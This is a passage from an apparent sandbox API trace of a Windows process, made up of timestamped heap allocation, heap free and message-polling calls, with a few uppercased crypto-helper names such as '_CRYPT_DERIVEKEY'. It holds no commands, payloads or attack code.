lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0165.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0165.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0165.314] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0165.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0165.314] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0165.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0165.314] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0165.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0165.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0165.314] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0165.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0165.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0165.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0165.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0165.314] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0165.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0165.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0165.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0165.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0165.314] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0165.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0165.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0165.314] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0165.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0165.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0165.316] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0165.316] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0165.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0165.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0165.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0165.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0165.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0165.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0165.316] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0165.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0165.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0165.316] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0165.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0165.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0165.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0165.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0165.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0165.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0165.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0165.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0165.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0165.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0165.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0165.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0165.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0165.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0165.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0165.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0165.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0165.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0165.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0165.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0165.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0165.318] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0165.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0165.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0165.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0165.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0165.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0165.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0165.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0165.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0165.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0165.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0165.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0165.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0165.318] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0165.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0165.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0165.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0165.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0165.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0165.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0165.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0165.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0165.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0165.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0165.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0165.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0165.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0165.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0165.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0165.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0165.319] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0165.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0165.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0165.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0165.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0165.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0165.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0165.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0165.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0165.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0165.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0165.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0165.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0165.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0165.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0165.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0165.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0165.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0165.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0165.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0165.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0165.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0165.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0165.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0165.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0165.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0165.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0165.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0165.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0165.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0165.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0165.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0165.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0165.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0165.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0165.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0165.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0165.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0165.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0165.321] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0165.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0165.321] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0165.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0165.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0165.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0165.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0165.321] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0165.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0165.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0165.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0165.322] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0165.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0165.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0165.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0165.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0165.322] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0165.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0165.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0165.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0165.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0165.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0165.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0165.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0165.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0165.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0165.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0165.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0165.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0165.489] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0165.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0165.489] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0165.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0165.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0165.489] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0165.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0165.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0165.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0165.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0165.489] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0165.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0165.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0165.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0165.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0165.489] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0165.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0165.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0165.489] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0165.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0165.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0165.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0165.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0165.489] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0165.490] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, 